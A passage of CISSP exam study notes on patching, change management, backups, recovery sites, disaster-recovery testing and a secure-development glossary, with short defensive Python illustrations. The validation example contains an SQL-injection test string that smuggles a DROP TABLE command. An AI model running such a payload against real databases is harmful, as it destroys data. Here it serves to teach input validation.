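            if conditions <= facts and conclusion not in facts:
                facts.add(conclusion)
                changed = True
    return facts

derived = infer({"failed_logins_high", "new_admin_account"})
print("open_incident_ticket" in derived)  # True: chained through two rules
```

Note how the third rule fires only because the first rule's conclusion became a new fact; that chaining is what the inference engine contributes beyond the raw knowledge base.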
7.8 Implement and support patch and vulnerability management (OSG-10 Chpt 16)
Vulnerability Management: activities necessary to identify, assess, prioritize, and remediate information
systems weaknesses
Vulnerability management includes routine vuln scans and periodic vuln assessments
vuln scanners can detect known security vulnerabilities and weaknesses, like the absence of patches or
weak passwords
vuln scanners generate reports that indicate the technical vulns of a system and are an effective check
for a patch management program
vuln assessments extend beyond just technical scans and can include review and audits to detect
vulnerabilities
Patch and vulnerability management processes work together to help protect an org against emerging threats;
patch management ensures that appropriate patches are applied, and vuln management helps verify that
systems are not vulnerable to known threats
Patch: (AKA updates, quick fixes, or hotfixes) a blanket term for any type of code written to correct a bug or
vulnerability or to improve existing software performance; when installed, a patch directly modifies files or
device settings without changing the version number or release details of the related software component
in the context of security, admins are primarily concerned with security patches, which are patches that
affect a systemʼs vulns
Patch Management: systematic notification, identification, deployment, installation and verification of OS and
app code revisions known as patches, hot fixes, and service packs
an effective patch management program ensures that systems are kept up to date with current patches
by evaluating, testing, approving, and deploying appropriate patches
Patch Tuesday: several big-tech orgs (e.g. Microsoft, Adobe, Oracle etc) regularly release patches on the
second Tuesday of every month
Patch management is often intertwined with change and configuration management, ensuring that
documentation reflects changes; when an org doesn't have an effective patch management program, it can
experience outages and incidents from known issues that could have been prevented
There are three methods for determining patch levels:
agent: update software (agent) installed on devices
agentless: remotely connect to each device
passive: monitor traffic to infer patch levels
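The agentless approach, for example, boils down to comparing remotely gathered version data against the latest known versions; a sketch with hypothetical hosts and package versions:

```python
# Latest versions published by vendors (hypothetical values).
LATEST = {"openssl": (3, 0, 14), "nginx": (1, 26, 1)}

# Inventory an agentless scanner might gather by remotely querying each device.
inventory = {
    "web01": {"openssl": (3, 0, 14), "nginx": (1, 24, 0)},
    "web02": {"openssl": (3, 0, 11), "nginx": (1, 26, 1)},
}

def missing_patches(inventory: dict) -> dict:
    """Report, per host, packages running below the latest known version."""
    report = {}
    for host, packages in inventory.items():
        # tuple comparison gives natural version ordering, e.g. (1,24,0) < (1,26,1)
        stale = [pkg for pkg, ver in packages.items() if ver < LATEST[pkg]]
        if stale:
            report[host] = sorted(stale)
    return report

print(missing_patches(inventory))  # {'web01': ['nginx'], 'web02': ['openssl']}
```

An agent-based tool produces the same kind of report, but the installed agent pushes the version data instead of the scanner pulling it.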
Deploying patches can be done manually or automatically
Common steps within an effective program:
evaluate patches: determine if they apply to your systems
test patches: test patches on an isolated, non-production system to determine if the patch causes any
unwanted side effects
approve the patches: after successful testing, patches are approved for deployment; itʼs common to use
Change Management as part of the approval process
deploy the patches: after testing and approval, deploy the patches; many orgs use automated methods to
deploy patches, via third-party or the software vendor
verify that patches are deployed: regularly test and audit systems to ensure they remain patched
vulnerability management consists of regularly identifying vulns, evaluating them, and taking steps to mitigate risks associated with them
it isnʼt possible to eliminate risks, and it isnʼt possible to eliminate all vulnerabilities
a vuln management program helps ensure that an org is regularly evaluating vulns and mitigating those
that represent the greatest risk
one of the most common vulnerabilities within an org is an unpatched system, and so a vuln management
program will often work in conjunction with a patch management program
7.9 Understand and participate in change management processes (OSG-10 Chpt 16)
Change management: formal process an org uses to transition from the current state to a future state; typically
includes mechanisms to request, evaluate, approve, implement, verify, and learn the change; ensures that the
costs and benefits of changes are analyzed and changes are made in a controlled manner to reduce risks
Change management processes allow various IT experts to review proposed changes for unintended
consequences before implementing
Change management controls provide a process to control, document, track, and audit all system
changes
The change management process includes multiple steps that build upon each other:
Change request: a change request can come from any part of an org and pertain to almost any topic;
companies typically use some type of change management software
Assess impact: after a change request is made, however small the request might be, the impact of the
potential change must be assessed
Approval/reject: based on the requested change and the related impact assessment, the change is
approved or rejected; common sense plays a big part in the approval process
Build and test: after approval, any change should be developed and tested, ideally in a test environment
Schedule/notification: prior to implementing any change, key stakeholders should be notified
Implement: after testing and notification of stakeholders, the change should be implemented; it's
important to have a roll-back plan, allowing personnel to undo the change
Validation: once implemented, senior management and stakeholders should again be notified to validate
the change
Document the change: documentation should take place at each step; it's critical to ensure all
documentation is complete and to identify the version and baseline related to a given change
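The "steps that build upon each other" idea can be sketched as a small state machine that refuses to run a step out of order; this is an illustration of the process, not a real change-management tool:

```python
# Step names follow the process above (hypothetical labels).
STEPS = ["request", "assess", "approve", "build_and_test",
         "notify", "implement", "validate", "document"]

class ChangeRequest:
    def __init__(self, description: str):
        self.description = description
        self.completed = []

    def advance(self, step: str) -> None:
        """Allow a step only when every earlier step has been completed."""
        expected = STEPS[len(self.completed)]
        if step != expected:
            raise ValueError(f"cannot run '{step}' before '{expected}'")
        self.completed.append(step)

cr = ChangeRequest("rotate TLS certificates")
cr.advance("request")
cr.advance("assess")
try:
    cr.advance("implement")   # skipping approval and testing is rejected
except ValueError as e:
    print(e)
```

In practice, change-management software enforces this ordering and records who performed each step, producing the audit trail the section describes.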
When a change management process is enforced, it creates documentation for all changes to a system,
providing a trail of info if personnel need to reverse the change, or make the same change on other systems
Change management control is a mandatory element for some security assurance requirements (SARs) in the
Common Criteria (ISO/IEC 15408)
7.10 Implement recovery strategies (OSG-10 Chpt 18)
Recovery strategy: a plan for restoring critical business components, systems, and operations following a
disruption
Disaster recovery (DR): set of practices that enable an organization to minimize loss of, and restore, mission-
critical technology infrastructure after a catastrophic incident
Business continuity (BC): set of practices that enables an organization to continue performing its critical
functions through and after any disruptive event
7.10.1 Backup storage strategies (e.g., cloud storage, onsite, offsite)
Backup strategies are driven by org goals and objectives and usually focus on backup and restore time as
well as storage needs; the goal is to determine how and where data is stored for recovery in case of data
loss, corruption, or disaster
3-2-1 rule:
3 copies of critical files
2 backups on different media
1 backup stored offsite
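A sketch of checking a backup catalog against the 3-2-1 rule; the catalog entries are hypothetical, and this assumes the production copy counts as one of the three copies:

```python
# Hypothetical backup catalog: where each backup copy lives and on what media.
backups = [
    {"media": "disk", "offsite": False},   # local NAS copy
    {"media": "tape", "offsite": False},   # onsite tape
    {"media": "cloud", "offsite": True},   # geo-redundant cloud copy
]

def satisfies_3_2_1(copies: list) -> bool:
    """3 copies total, on at least 2 media types, with at least 1 offsite.

    The production data itself counts as one of the three copies, so two
    backup copies are required here.
    """
    total_copies = 1 + len(copies)                 # source + backups
    media_types = {c["media"] for c in copies}
    offsite = any(c["offsite"] for c in copies)
    return total_copies >= 3 and len(media_types) >= 2 and offsite

print(satisfies_3_2_1(backups))        # True
print(satisfies_3_2_1(backups[:1]))    # False: too few copies, nothing offsite
```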
Onsite backup: storing backup data within the same location as the source data (AKA local backup);
onsite backups have the downside that if through some disaster you lose your source data, there is a
chance you could also lose your backup
Offsite backup: storing backup data at a different location from where the original data is stored; the
offsite location should be geographically remote from, or far enough away from, the source data that a
single disaster is unlikely to destroy both the original data and the backup
Backup storage best practices include keeping copies of the media in at least one offsite location
to provide redundancy should the primary location be unavailable, incapacitated, or destroyed;
common strategy is to store backups in a cloud service that is itself geographically redundant
Two common backup strategies:
1. full backup on Monday night, then run differential backups every other night of the week
    if a failure occurs Saturday morning, restore Mondayʼs full backup and then restore
    only Fridayʼs differential backup
2. full backup on Monday night, then run incremental backups every other night of the week
    if a failure occurs Saturday morning, restore Mondayʼs full backup and then restore
    each incremental backup in the original chronological order
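The difference between the two strategies is which "last backup" each night's job measures against; a sketch using file modification times (the day numbers and file names are illustrative):

```python
# Hypothetical catalog: last-modified day per file.
files = {"a.txt": 1, "b.txt": 3, "c.txt": 5}

last_full = 2      # Monday-night full backup ran on day 2
last_backup = 4    # most recent backup of ANY kind ran on day 4

def differential(files: dict, last_full: int) -> list:
    """Everything changed since the last FULL backup."""
    return sorted(f for f, mtime in files.items() if mtime > last_full)

def incremental(files: dict, last_backup: int) -> list:
    """Only what changed since the last backup of ANY kind."""
    return sorted(f for f, mtime in files.items() if mtime > last_backup)

print(differential(files, last_full))   # ['b.txt', 'c.txt']
print(incremental(files, last_backup))  # ['c.txt']
```

This is why differentials grow each night but restore in two steps, while incrementals stay small but must be restored as a whole chain.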
| Feature | Full Backup | Incremental Backup | Differential Backup |
|---|---|---|---|
| Description | A complete copy of all selected data | Only backs up data that has changed since the last backup (regardless of backup type) | Backs up all changes made since the last full backup |
| Storage Space | Requires the most storage space | Requires the least storage space | Requires more space than incremental but less than full |
| Backup Speed | Slowest, as it copies all data | Fastest, as it only copies data changed since the last backup | Faster than full but slower than incremental, as it copies all changes since the last full backup |
| Recovery Speed | Fastest, as all data is in one place | Slowest, as it may require multiple incremental backups to restore to a specific point | Faster than incremental since it requires only the last full backup and the last differential backup |
| Complexity | Simplest, with no dependency on previous backups | Complex, as it depends on a chain of backups from the last full backup to the most recent incremental backup | Less complex than incremental; requires the last full backup and the last differential backup for restoration |
| Best Use Case | When backup time and storage space are not issues; ideal for less frequent backups | Suitable for environments where daily changes are minimal and quick backups are necessary | Ideal for environments where storage space is a concern but restoration time needs to be relatively quick |
Three main techniques used to create offsite copies of database content: electronic vaulting,
remote journaling, and remote mirroring
electronic vaulting: where database backups are moved to a remote site using bulk
transfers
remote journaling: database transaction logs are transferred to the remote site in a more
expeditious manner (more frequently than bulk vaulting); remote journaling is similar to electronic
vaulting in that transaction logs transferred to the remote site are not applied to a live database
server but are maintained in a backup device
remote mirroring: the most advanced (and most expensive) db backup solution; with remote
mirroring, a live db server is maintained at the backup site; the remote server receives copies of
the db modifications at the same time they are applied to the production server at the primary site
7.10.2 Recovery site strategies (e.g., cold vs. hot, resource capacity agreements)
Non-disaster: service disruption with significant but limited impact
Disaster: event that causes an entire site to be unusable for a day or longer (usually requires alternate
processing facility)
Natural disaster: events that commonly threaten orgs including earthquakes, floods, storms, fires,
tsunamis, and volcanic eruptions
Human-caused disasters: explosions, electrical fires, terrorist acts, power outages and other utility
failures, hardware/software failures, labor difficulties, theft, vandalism, etc.
Catastrophe: major disruption that destroys the facility altogether
For disasters and catastrophes, an org has 3 basic options:
use a dedicated site that the org owns/operates
lease a commercial facility (hot, warm, cold site)
enter into a formal agreement with another facility/org
When a disaster interrupts a business, a disaster recovery plan should kick in nearly automatically
and begin providing support for recovery operations
in addition to improving your response capabilities, purchasing insurance can reduce the
impact of financial losses
Recovery site strategies consider multiple elements of an organization, such as people, data,
infrastructure, and cost, as well as factors like availability and location
When designing a disaster recovery plan, itʼs important to keep your goal in mind — the restoration
of workgroups to the point that they can resume their activities in their usual work locations
sometimes it's best to develop separate recovery facilities for different work groups
To recover your business operations with the greatest possible efficiency, you should engineer the
disaster recovery plan so that those business units with the highest priority are recovered first
Mutual Assistance Agreements (MAA): provide an inexpensive alternative to disaster recovery sites;
not commonly used because they are difficult to enforce; orgs participating in an MAA may also be shut
down by the same disaster, and MAAs raise confidentiality concerns
Resource Capacity Agreements: pre-arranged vendor agreements to secure the necessary resources
required after a disruptive event; the goal is to ensure an org has access to resources at a recovery site
7.10.3 Multiple processing sites
Building fully resilient recovery processes means including alternative processing sites for disaster
recovery scenarios; multiple processing sites increase geographic diversity as well as resilience to
calamitous events
One of the most important elements of the disaster recovery plan is the selection of alternate processing
sites to be used when the primary sites are unavailable
cold sites: standby facilities large enough to handle the processing load of an organization and
equipped with appropriate electrical and environmental support systems
a cold site has NO COMPUTING FACILITIES (hardware or software) preinstalled
a cold site has no active broadband comm links
advantages:
a cold site is the LEAST EXPENSIVE OPTION and perhaps the most practical
disadvantages:
tremendous lag to activate the site, often measured in weeks, which can yield a false
sense of security
difficult to test
warm sites: a warm site is better than a cold site because, in addition to the shell of a building,
basic equipment is installed
a warm site contains the data links and preconfigured equipment necessary to begin
restoring operations, but no usable data or information
unlike hot sites, however, warm sites do not typically contain copies of the clientʼs data
activation of a warm site typically takes at least 12 hours from the time a disaster is declared
hot sites: a fully operational offsite data processing facility equipped with hardware and software; a
backup facility that is maintained in constant working order, with a full complement of servers,
workstations, and comm links
a hot site is usually a subscription service
the data on the primary site servers is periodically or continuously replicated to
corresponding servers at the hot site, ensuring that the hot site has up-to-date data
advantages:
unsurpassed level of disaster recovery protection
disadvantages:
extremely costly, likely doubling an orgʼs budget for hardware, software and services,
and requires the use of additional employees to maintain the site
has (by definition) copies of all production data, and therefore increases your attack
surface
Mobile sites: non-mainstream alternatives to traditional recovery sites; usually configured as cold
or warm sites, if your DR plan depends on a workgroup recovery strategy, mobile sites are an
excellent way to implement that approach
Cloud computing: many orgs now turn to cloud computing (often via IaaS) as their preferred
disaster recovery option
some companies that maintain their own datacenters may choose to use these IaaS
options as backup service providers
Note: the exam differentiates between a hot site, which is a subscription service, and a
redundant site, which is owned and maintained by the org (and a redundant site may be
"hot" in terms of capabilities)
7.10.4 System resilience, High Availability (HA), Quality of Service (QoS), and fault tolerance
System resilience: the ability of a system to maintain an acceptable level of service during an adverse
event
High Availability (HA): the use of redundant technology components to allow a system to quickly
recover from a failure after experiencing a brief disruption
Clustering: refers to a group of systems working together to handle workloads; often seen in
the context of web servers that use a load balancer to manage incoming traffic, and
distributes requests to multiple web servers (the cluster)
Redundancy: unlike a cluster, where all members work together, redundancy typically
involves a primary and secondary system; the primary system does all the work, and the
secondary system is in standby mode unless the primary system fails, at which time activity
can fail over to the secondary
Both clustering and redundancy include high availability as a by-product of their
configuration
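The primary/secondary failover behavior can be sketched as follows (service names and the health-check mechanism are hypothetical):

```python
class Service:
    """A stand-in for a server that can be up or down."""
    def __init__(self, name: str, healthy: bool = True):
        self.name, self.healthy = name, healthy

    def handle(self, request: str) -> str:
        if not self.healthy:
            raise RuntimeError(f"{self.name} is down")
        return f"{self.name} handled {request}"

def dispatch(primary: Service, secondary: Service, request: str) -> str:
    """Redundancy: the primary does all the work; on failure,
    activity fails over to the standby secondary."""
    try:
        return primary.handle(request)
    except RuntimeError:
        return secondary.handle(request)

primary, standby = Service("primary"), Service("standby")
print(dispatch(primary, standby, "req-1"))   # primary handled req-1
primary.healthy = False
print(dispatch(primary, standby, "req-2"))   # standby handled req-2
```

A cluster behaves differently: a load balancer would spread requests across all healthy members at once, rather than keeping one member idle in standby.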
Quality of Service (QoS): controls protect the availability of data networks under load
many factors contribute to the quality of the end-user experience and QoS attempts to
manage all of these factors to create an experience that meets business requirements
| Site Recovery Method | Cost Implications | Time Implications for RTO |
|---|---|---|
| Hot Site | High cost; a duplicate of the original site with full computer systems and near-real-time replication of data, ready to take over operations immediately | Minimal recovery time, designed for seamless takeover with data and systems up-to-date, allowing critical operations to continue with little to no downtime |
| Redundant Site | Highest cost; essentially operates as an active-active configuration where both sites are running simultaneously, fully mirroring each other | Instantaneous recovery, as the redundant site is already running in parallel with the primary site, ensuring no interruption in service |
7.11 Implement Disaster Recovery (DR) processes (OSG-10 Chpt 18)
Business Continuity Management (BCM): the process and function by which an organization is responsible
for creating, maintaining, and testing BCP and DRP plans
Business Continuity Planning (BCP): focuses on the survival of the business processes when something
unexpected impacts it
Disaster Recovery Planning (DRP): focuses on the recovery of vital technology infrastructure and systems
BCM, BCP, and DRP are ultimately used to achieve the same goal: the continuity of the business and its
critical and essential functions, processes, and services
The key BCP/DRP steps are:
Develop contingency planning policy
Conduct BIA
Identify controls
Create contingency strategies
Develop contingency plan
Ensure testing, training, and exercises
Maintenance
As part of the Business Impact Analysis (BIA), four key measurements for BCP and DRP procedures:
RPO (recovery point objective): max tolerable data loss measured in time
RTO (recovery time objective): max tolerable time to recover systems to a defined service level;
specifies the amount of time that business continuity planners find acceptable for the restoration of a
service after a disaster
WRT (work recovery time): max time available to verify system and data integrity as part of the
resumption of normal ops
MTD (max tolerable downtime): max time-critical system, function, or process can be disrupted before
unacceptable/irrecoverable consequences to the business
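These measurements relate arithmetically: the time to recover systems (RTO) plus the time to verify them (WRT) must fit within the MTD, commonly expressed as RTO + WRT ≤ MTD. A sketch with hypothetical hour values:

```python
def recovery_plan_is_feasible(rto: float, wrt: float, mtd: float) -> bool:
    """Check that recovery (RTO) plus verification (WRT) fits within the
    maximum tolerable downtime (MTD). All values in the same unit (hours)."""
    return rto + wrt <= mtd

print(recovery_plan_is_feasible(rto=4, wrt=2, mtd=8))   # True: 6h fits within 8h
print(recovery_plan_is_feasible(rto=6, wrt=4, mtd=8))   # False: 10h exceeds the MTD
```

RPO is independent of this check: it constrains how much data may be lost (and therefore how frequently backups or replication must run), not how long recovery may take.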
7.11.1 Response
A disaster recovery plan should contain simple yet comprehensive instructions for essential personnel to
follow immediately upon recognizing that a disaster is in progress or imminent
Emergency-response plans are often put together in the form of checklists provided to responders; arrange
the checklist tasks in order of priority, with the most important task first!
The response plan should include clear criteria for activation of the disaster recovery plan, define who has
the authority to declare a disaster, and then discuss notification procedures
7.11.2 Personnel
A disaster recovery plan should contain a list of personnel to contact in the event of a disaster
usually includes key members of the DRP team as well as critical personnel
Businesses need to make sure employees are trained on DR procedures and that they have the necessary
resources to implement the DR plan
Key activities involved in preparing people and procedures for DR include:
develop DR training programs
conduct regular DR drills
provide employees with necessary resources and tools to implement the DR plan
communicate the DR plan to all employees
7.11.3 Communications (e.g., methods)
Ensure that response checklists provide first responders with a clear plan to protect life and property and
ensure the continuity of operations
the notification checklist should be supplied to all personnel who might respond to a disaster
the information provided should include alternate means of contact (e.g. mobile phones, pagers,
etc.) as well as backup contacts for each role
7.11.4 Assessment
When the DR team arrives on site, one of their first tasks is to assess the situation
this normally occurs in a rolling fashion, with the first responders performing a simple assessment
to triage the situation and get the disaster response under way
as the incident progresses more detailed assessments will take place to gauge effectiveness, and
prioritize the assignment of resources
7.11.5 Restoration
Note that recovery and restoration are separate concepts
Restoration: bringing a business facility and environment back to a workable state
Recovery: bringing business operations and processes back to a working state
System recovery includes the restoration of all affected files and services actively in use on the system at
the time of the failure or crash
When designing a disaster recovery plan, itʼs important to keep your goal in mind — the restoration of
workgroups to the point that they can resume their activities in their usual work locations
7.11.6 Training and awareness
As with a business continuity plan, it is essential that you provide training to all personnel who will be
involved in the disaster recovery effort
When designing a training plan consider the following:
orientation training for all new employees
initial training for employees taking on a new DR role for the first time
detailed refresher training for DR team members
brief awareness refreshers for all other employees
7.11.7 Lessons learned
A lessons learned session should be conducted at the conclusion of any disaster recovery operation or
other security incident
The lessons learned process is designed to provide everyone involved with the incident response effort
an opportunity to reflect on their individual roles and the team's overall response
Time is of the essence in conducting a lessons learned session, before memories fade
Usually a lessons learned session is led by trained facilitators
NIST SP 800-61 offers a series of questions to use in the lessons learned process:
exactly what happened and at what times?
how well did staff and management perform in dealing with the incident?
were documented procedures followed?
were the procedures adequate?
were any steps or actions taken that might have inhibited the recovery?
what would the staff and management do differently the next time a similar incident occurs?
how could information sharing with other organizations have been improved?
what corrective actions can prevent similar incidents in the future?
what precursors or indicators should be watched for in the future to detect similar incidents?
what additional tools or resources are needed to detect, analyze, and mitigate future incidents?
The team leader should document the lessons learned in a report that includes suggested process
improvement actions
7.12 Test Disaster Recovery Plans (DRP) (OSG-10 Chpt 18)
Every DR plan must be tested on a periodic basis to ensure that the planʼs provisions are viable and that it meets
an orgʼs changing needs
Five main test types:
read-through/checklist tests
structured walk-throughs
simulation tests
parallel tests
full-interruption tests
7.12.1 Read-through/tabletop
Read-through test: one of the simplest to conduct, but also one of the most critical; copies of a DR plan
are distributed to the members of the DR team for review, accomplishing three goals:
ensure that key personnel are aware of their responsibilities and have that knowledge refreshed
periodically
provide individuals with an opportunity to review and update plans, removing obsolete info
helps identify situations in which key personnel have left the company and the DR responsibility
needs to be re-assigned (note that DR responsibilities should be included in job descriptions)
7.12.2 Walkthrough
Structured walk-through: AKA tabletop exercise, takes testing one step further, where members of the
DR team gather in a large conference room and role-play a disaster scenario
the team refers to their copies of the DR plan and discuss the appropriate responses to that
particular type of disaster
7.12.3 Simulation
Simulation tests: similar to the structured walk-throughs, where team members are presented with a
scenario and asked to develop an appropriate response
unlike a read-through and walk-through, some of these response measures are then tested
this may involve the interruption of noncritical business activities and the use of some operational
personnel
7.12.4 Parallel
Parallel tests: represent the next level, and involve relocating personnel to the alternate recovery site and
implementing site activation procedures
the relocated employees perform their DR responsibilities just as they would for an actual disaster
operations at the main facility are not interrupted
7.12.5 Full interruption
Full-interruption tests: operate like parallel tests, but involve actually shutting down operations at the
primary site and shifting them to the recovery site
these tests involve significant risk (shutting down the primary site, transferring recovery ops,
followed by the reverse) and are therefore extremely difficult to arrange (management resistance
to these tests is likely)
7.12.6 Communications (e.g., stakeholders, test status, regulators)
Before starting DRP testing, it's important to inform all stakeholders what to expect, including
the scheduled timing, potential impacts, and the goals of testing
During testing it's important to provide regular updates, especially for larger full-interruption testing,
ensuring that stakeholders are aware of progress, challenges, and end-time changes
Post-test debriefing sessions can be used to review outcomes, looking at successes and areas that need
improvement
Many industries with stringent regulations require specific DR testing plans, and keeping
regulators informed is important for compliance as well as governance
7.13 Participate in Business Continuity (BC) planning and exercises (OSG-10 Chpt 3)
Business continuity planning addresses how to keep an org in business after a major disruption takes place
It's important to note that the scope is much broader than that of DR
A security leader will likely be involved, but not necessarily lead the BCP effort
The BCP life cycle includes:
Developing the BC concept
Assessing the current environment
Implementing continuity strategies, plans, and solutions
Training the staff
Testing, exercising, and maintaining the plans and solutions
7.14 Implement and manage physical security (OSG-10 Chpt 10)
Physical access control mechanisms are deployed to control, monitor, and manage access to a facility
Sections, divisions, or areas within a site should be clearly designated as public, private, or restricted with
appropriate signage
7.14.1 Perimeter security controls
A fence is a perimeter-defining device and can consist of:
stripes painted on the ground
chain link fences
barbed wire
concrete walls
Acceptance: formal, structured hand-off of the completed software system to the customer org; usually
involves test, analysis and assessment activities
Accreditation: AKA Security Accreditation; a formal declaration by a designated accrediting authority (DAA) that
an information system is approved to operate at an acceptable level of risk, based on the implementation of an
approved set of technical, managerial, and procedural safeguards
ACID Test: data integrity provided by means of enforcing atomicity, consistency, isolation, and durability
policies
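The atomicity part of ACID can be seen directly with the standard library's sqlite3 module; the table and amounts below are illustrative, not from the source text:

```python
import sqlite3

# Sketch of atomicity: a failed transfer rolls back entirely, so the database
# never shows a half-completed state.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (name TEXT PRIMARY KEY, balance INTEGER)")
conn.execute("INSERT INTO accounts VALUES ('alice', 100), ('bob', 0)")
conn.commit()

try:
    with conn:  # commits on success, rolls back automatically on exception
        conn.execute("UPDATE accounts SET balance = balance - 50 WHERE name = 'alice'")
        raise RuntimeError("simulated crash before crediting bob")
except RuntimeError:
    pass

balances = dict(conn.execute("SELECT name, balance FROM accounts"))
print(balances)  # {'alice': 100, 'bob': 0} — the debit was rolled back
```

Consistency, isolation, and durability are enforced by the database engine in the same spirit: either the whole transaction takes effect, or none of it does.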
Aggregation: ability to combine non-sensitive data from separate sources to create sensitive info; note that
aggregation is a "security issue", whereas inference is an attack (where an attacker pulls together pieces of
less sensitive info to derive info of greater sensitivity)
Arbitrary code: alternate set of instructions and data that an attacker attempts to trick a processor into
executing
Buffer overflow: source code vulnerability allowing access to data locations outside of the storage space
allocated to the buffer; can be triggered by attempting to input data larger than the size of the buffer
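Python's runtime bounds checking makes a classic C-style overflow impossible, but the length check below is exactly what safe C code must add by hand before copying into a fixed buffer; the buffer size and inputs are illustrative:

```python
# A fixed-size buffer plus the guard that an unsafe strcpy()-style copy omits.
BUF_SIZE = 16
buf = bytearray(BUF_SIZE)

def copy_to_buffer(dest: bytearray, data: bytes) -> None:
    """Reject input larger than the destination instead of writing past its end."""
    if len(data) > len(dest):
        raise ValueError(f"input of {len(data)} bytes exceeds {len(dest)}-byte buffer")
    dest[:len(data)] = data

copy_to_buffer(buf, b"hello")        # fits: copied
try:
    copy_to_buffer(buf, b"A" * 64)   # oversized: rejected before any write
    overflowed = True
except ValueError:
    overflowed = False
print(bytes(buf[:5]), overflowed)    # b'hello' False
```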
Bypass attack: attempt to bypass front-end controls of a database to access information
Certification: comprehensive technical security analysis of a system to ensure it meets all applicable security
requirements
CAB: the Change Advisory Board's purpose is to review and approve/reject proposed code changes
Citizen programmers: organizational members who codify work-related knowledge, insights, and ideas into
(varying degrees of) usable software; the process and result is ad hoc, difficult to manage, and usually bereft of
security considerations
Code protection/logic hiding: prevents one software unit from reading/altering the
source/intermediate/executable code of another software unit
Code reuse: reusing existing units of software (procedures/objects) rather than re-inventing them; yields
higher productivity toward development requirements when the reused code is correct, complete, and safe
Complete coverage: testing all of the functions of software
Concurrency: using a lock to allow an authorized user to make changes, then unlock the data element after
changes are complete
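The lock-then-change-then-unlock pattern described above can be sketched with a threading lock; the counts are illustrative:

```python
import threading

balance = 0
lock = threading.Lock()

def deposit(amount: int, times: int) -> None:
    global balance
    for _ in range(times):
        with lock:                       # lock, change the shared data element, unlock
            current = balance            # read...
            balance = current + amount   # ...modify-write, atomic under the lock

threads = [threading.Thread(target=deposit, args=(1, 10_000)) for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(balance)  # 40000 — without the lock, interleaved read-modify-writes could lose updates
```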
Object/Memory reuse: systems allocate/release and reuse memory/resources as objects to requesting
processes; data remaining in the object when it is reused is a potential security violation (i.e. data remanence)
CORBA: Common Object Request Broker Architecture is a set of standards addressing interoperability between
software and hardware products, residing on different machines across a network; providing object location and
use across a network
Configuration Control: process of controlling modifications to hardware, firmware, software, and
documentation to protect the information system against improper modifications prior to, during, and after
system implementation
Configuration Management (CM): collection of activities focused on establishing and maintaining integrity of
IT products and information systems, through the control of processes for initialization, changing and
monitoring the configurations of those products and systems throughout the system development lifecycle
Covert Channels/Paths: a method used to pass information over a path that is not normally used for
communication; communication pathways that violate security policy or requirement (deliberately or
unwittingly); basic types are timing and storage
Data Contamination: attackers use malformed inputs at the field, record, transaction, or file level in an
attempt to disrupt the proper functioning of the system
Data Lake: a data warehouse incorporating multiple types of streams of unstructured or semi-structured data
Data Mining: analysis and decision-making technique that relies on extracting deeper meanings from many
different instances and types of data; often applied to data warehouse content
Data Modeling: design process that identifies all data elements that the system will need to input, create, store,
modify, output, and destroy during operational use; should be one of the first steps in analysis and design
Data Protection and Data Hiding: restricts or prevents one software unit from reading or altering the private
data of another software unit or in preventing data from being discovered or accessed by a subject
Data Type Enforcement: how a language protects a developer from trying to perform operations on dissimilar
types of data, or in ways that would lead to erroneous results
Data Warehouse: collection of data sources such as separate internal databases to provide a broader base of
info for analysis, trending and reference; may also involve databases from outside the org
Data-centric Threat Modeling: methodology and framework focusing on the authorized movements and data
input/output into and from a system; corresponds with protecting data in transit, at rest, and in use when
classifying organizational data
Defensive Programming: design/coding that accepts only validated, sanitized data inputs to a system; lack of
defensive programming measures can result in arbitrary code execution, misdirection of the program to other
resources/locations, or reveal info useful to an attacker
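A minimal sketch of defensive programming via allow-list input validation; the username policy (regex) and helper name are hypothetical, chosen only for illustration:

```python
import re

# Allow-list: only lowercase names of 3-16 chars, starting with a letter.
USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{2,15}")

def sanitize_username(raw: str) -> str:
    candidate = raw.strip().lower()
    if not USERNAME_RE.fullmatch(candidate):
        raise ValueError("username rejected by input validation")
    return candidate

accepted = sanitize_username("  Alice_01 ")   # normalized to "alice_01" and accepted
try:
    sanitize_username("alice'; DROP TABLE users;--")
    rejected = False
except ValueError:
    rejected = True                            # hostile input never reaches a query
print(accepted, rejected)                      # alice_01 True
```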
Design Reviews: should take place after the development of functional and control specifications but before
the creation of code
Dirty read: occurs when one transaction reads a value from a database that was written by another transaction
that didn't commit
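The sequence can be simulated without a database engine; "Transaction A" and "B" below are plain dicts standing in for real transactions at READ UNCOMMITTED isolation:

```python
# A writes an uncommitted value, B reads it (a dirty read), then A rolls back,
# leaving B holding data that never officially existed.
committed = {"price": 100}
uncommitted = dict(committed)

uncommitted["price"] = 250           # transaction A writes, but has not committed

dirty_value = uncommitted["price"]   # transaction B reads the uncommitted value: 250

uncommitted = dict(committed)        # A rolls back; the write is discarded

print(dirty_value, committed["price"])  # 250 100 — B acted on a value that was never committed
```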
Emerging Properties: an alternate/more powerful way of looking at systems-level behavior characteristics such
as safety and security; helps provide a more testable, measurable answer to questions such as "how secure is
our system?"
Encapsulation: (see network encapsulation in Domain 4 for disambiguation) enforcement of data/code hiding
during all phases of software development and operational use; bundling together data and methods is the
process of encapsulation (opposite of unpacking/revealing)
Executable/Object Code: binary representation of the machine language instruction set that the CPU and other
hardware of the target computer can directly execute
XML: Extensible Markup Language is a markup language (a sibling of HTML; both derive from SGML) providing for
data storage and transport in networked environments; frequently used to integrate web pages with databases;
XML is often embedded in the HTML files making up elements of a web page
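Parsing such a document takes only the standard library; the document itself is a made-up example of data stored/transported as XML:

```python
import xml.etree.ElementTree as ET

# Hypothetical XML payload, e.g. records a web page might pull from a database.
doc = """<accounts>
  <account id="a1"><owner>alice</owner></account>
  <account id="a2"><owner>bob</owner></account>
</accounts>"""

root = ET.fromstring(doc)
owners = {a.get("id"): a.findtext("owner") for a in root.iter("account")}
print(owners)  # {'a1': 'alice', 'a2': 'bob'}
```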
Functional requirements: describes a finite task or process the system must perform; often directly traceable
to specific elements in the final system's design and construction
Hierarchical database model: data elements and records are arranged in tree-like parent-child structures
Instance: in object-oriented programming, an "instance of a class" refers to a specific object created from that
class, which is a blueprint or template defining the characteristics and behaviors of objects
Integrated Product and Process Development (IPPD): management technique that simultaneously integrates
essential acquisition activities through the use of multidisciplinary teams to optimize the design, manufacturing,
and supportability processes
Integrated Product Team: team of stakeholders and individuals that possess different skills and who work
together to achieve a defined process or product
Infrastructure as Code (IaC): instead of viewing hardware config as a manual, direct hands-on, one-on-one
admin hassle, it is viewed as just another collection of elements to be managed in the same way that software
and code are managed under DevSecOps
Interactive Application Security Testing (IAST): testing that combines or integrates SAST and DAST to
